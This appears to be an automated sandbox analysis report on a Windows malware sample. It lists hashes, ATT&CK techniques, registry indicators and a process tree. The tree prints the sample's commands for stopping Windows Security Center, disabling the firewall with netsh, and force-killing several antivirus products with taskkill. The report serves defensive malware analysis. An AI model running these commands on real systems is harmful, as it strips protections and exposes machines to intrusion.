8b8e66d39c2aef111ec17621167dc32c20635e09080bb2340a76fb5a779a60da

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
26-07-2024 06:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe
Size

19KB
MD5

72efb8ce495abcc5d0513eca8d5cd07a
SHA1

5a4653a620a54e229acdc9774e122d201292564c
SHA256

8b8e66d39c2aef111ec17621167dc32c20635e09080bb2340a76fb5a779a60da
SHA512

74259b52f6761413816e1755708bcde23e730e93f3c828aff68112632df1ddea927faa91927314485c78f5fe2f4b3c15ef7735900877e70fcdce9774fe6876a6
SSDEEP

192:rjBPHGypoknDzNDL8EwD1yxDhsC+FpYKkvyFWjcCDi:rjx5XJL8EqoxNZ+FpY/Kwjre

Score

10^/10

discovery evasion execution persistence privilege_escalation

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2752	netsh.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2792	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1232	taskkill.exe
1360	taskkill.exe
1436	taskkill.exe
2012	taskkill.exe
2676	taskkill.exe
2288	taskkill.exe
2924	taskkill.exe
2196	taskkill.exe
1212	taskkill.exe
1216	taskkill.exe
2468	taskkill.exe
2584	taskkill.exe
2784	taskkill.exe
1980	taskkill.exe
1816	taskkill.exe
316	taskkill.exe
2760	taskkill.exe
672	taskkill.exe
2956	taskkill.exe
2624	taskkill.exe
1160	taskkill.exe
956	taskkill.exe
2528	taskkill.exe
3032	taskkill.exe
1932	taskkill.exe
2544	taskkill.exe
1240	taskkill.exe
2672	taskkill.exe
2168	taskkill.exe
2196	taskkill.exe
3064	taskkill.exe
2736	taskkill.exe
836	taskkill.exe
2312	taskkill.exe
1548	taskkill.exe
2468	taskkill.exe
2736	taskkill.exe
2312	taskkill.exe
772	taskkill.exe
2236	taskkill.exe
2456	taskkill.exe
1792	taskkill.exe
1312	taskkill.exe
1580	taskkill.exe
2156	taskkill.exe
1788	taskkill.exe
1880	taskkill.exe
2912	taskkill.exe
2548	taskkill.exe
2980	taskkill.exe
1440	taskkill.exe
2652	taskkill.exe
564	taskkill.exe
340	taskkill.exe
2796	taskkill.exe
1808	taskkill.exe
2636	taskkill.exe
996	taskkill.exe
1536	taskkill.exe
3064	taskkill.exe
2264	taskkill.exe
1988	taskkill.exe
2140	taskkill.exe
1440	taskkill.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	2548	taskkill.exe
Token: SeDebugPrivilege	2624	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	1212	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	340	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	2528	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	2140	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1216	taskkill.exe
Token: SeDebugPrivilege	1312	taskkill.exe
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	1440	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeDebugPrivilege	2672	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	1232	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	2952	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1436	taskkill.exe
Token: SeDebugPrivilege	1440	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 2248	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	31
PID 2432 wrote to memory of 2248	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	31
PID 2432 wrote to memory of 2248	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	31
PID 2432 wrote to memory of 2248	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	31
PID 2248 wrote to memory of 2680	2248	cmd.exe	32
PID 2248 wrote to memory of 2680	2248	cmd.exe	32
PID 2248 wrote to memory of 2680	2248	cmd.exe	32
PID 2248 wrote to memory of 2680	2248	cmd.exe	32
PID 2680 wrote to memory of 2700	2680	net.exe	33
PID 2680 wrote to memory of 2700	2680	net.exe	33
PID 2680 wrote to memory of 2700	2680	net.exe	33
PID 2680 wrote to memory of 2700	2680	net.exe	33
PID 2432 wrote to memory of 2756	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	34
PID 2432 wrote to memory of 2756	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	34
PID 2432 wrote to memory of 2756	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	34
PID 2432 wrote to memory of 2756	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	34
PID 2756 wrote to memory of 2752	2756	cmd.exe	35
PID 2756 wrote to memory of 2752	2756	cmd.exe	35
PID 2756 wrote to memory of 2752	2756	cmd.exe	35
PID 2756 wrote to memory of 2752	2756	cmd.exe	35
PID 2432 wrote to memory of 2704	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	36
PID 2432 wrote to memory of 2704	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	36
PID 2432 wrote to memory of 2704	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	36
PID 2432 wrote to memory of 2704	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	36
PID 2704 wrote to memory of 2692	2704	cmd.exe	37
PID 2704 wrote to memory of 2692	2704	cmd.exe	37
PID 2704 wrote to memory of 2692	2704	cmd.exe	37
PID 2704 wrote to memory of 2692	2704	cmd.exe	37
PID 2692 wrote to memory of 2904	2692	net.exe	38
PID 2692 wrote to memory of 2904	2692	net.exe	38
PID 2692 wrote to memory of 2904	2692	net.exe	38
PID 2692 wrote to memory of 2904	2692	net.exe	38
PID 2432 wrote to memory of 2784	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	39
PID 2432 wrote to memory of 2784	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	39
PID 2432 wrote to memory of 2784	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	39
PID 2432 wrote to memory of 2784	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	39
PID 2784 wrote to memory of 2684	2784	cmd.exe	40
PID 2784 wrote to memory of 2684	2784	cmd.exe	40
PID 2784 wrote to memory of 2684	2784	cmd.exe	40
PID 2784 wrote to memory of 2684	2784	cmd.exe	40
PID 2684 wrote to memory of 2804	2684	net.exe	41
PID 2684 wrote to memory of 2804	2684	net.exe	41
PID 2684 wrote to memory of 2804	2684	net.exe	41
PID 2684 wrote to memory of 2804	2684	net.exe	41
PID 2432 wrote to memory of 3068	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	42
PID 2432 wrote to memory of 3068	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	42
PID 2432 wrote to memory of 3068	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	42
PID 2432 wrote to memory of 3068	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	42
PID 3068 wrote to memory of 2792	3068	cmd.exe	43
PID 3068 wrote to memory of 2792	3068	cmd.exe	43
PID 3068 wrote to memory of 2792	3068	cmd.exe	43
PID 3068 wrote to memory of 2792	3068	cmd.exe	43
PID 2432 wrote to memory of 2824	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	44
PID 2432 wrote to memory of 2824	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	44
PID 2432 wrote to memory of 2824	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	44
PID 2432 wrote to memory of 2824	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	44
PID 2824 wrote to memory of 2584	2824	cmd.exe	45
PID 2824 wrote to memory of 2584	2824	cmd.exe	45
PID 2824 wrote to memory of 2584	2824	cmd.exe	45
PID 2824 wrote to memory of 2584	2824	cmd.exe	45
PID 2432 wrote to memory of 2604	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	47
PID 2432 wrote to memory of 2604	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	47
PID 2432 wrote to memory of 2604	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	47
PID 2432 wrote to memory of 2604	2432	72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe	47

C:\Users\Admin\AppData\Local\Temp\72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\72efb8ce495abcc5d0513eca8d5cd07a_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @net stop wscsvc >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\SysWOW64\net.exe
    net stop wscsvc
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wscsvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @netsh firewall set opmode mode = disable >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode = disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @net stop SharedAccess >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:2904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @net stop wscsvc >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\net.exe
    net stop wscsvc
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wscsvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @sc config wscsvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\SysWOW64\sc.exe
    sc config wscsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:2792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgcc.exe >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgcc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgcc.exe >nul
  2⤵
  PID:2604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgcc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgamsvr.exe >nul
  2⤵
  PID:2608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgamsvr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgupsvc.exe >nul
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgupsvc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgw.exe >nul
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgw.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgcc32.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgcc32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgctrl.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgctrl.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgserv.exe >nul
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgserv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgserv9.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgserv9.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgserv9schedapp.exe >nul
  2⤵
  PID:1320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgserv9schedapp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgw.exe >nul
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgw.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgemc.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgemc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashwebsv.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashdisp.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashdisp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashmaisv.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashmaisv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashserv.exe >nul
  2⤵
  PID:2104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashserv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im aswUpdSv.exe >nul
  2⤵
  PID:3044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im aswUpdSv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashwebsv.exe >nul
  2⤵
  PID:1296
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im savscan.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im savscan.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im symwsc.exe >nul
  2⤵
  PID:1512
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im symwsc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im norton.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norton.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im Norton Auto-Protect.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Norton Auto-Protect.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im norton_av.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norton_av.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im norton_av.exe >nul
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im norton_av.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im nortonav.exe >nul
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nortonav.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
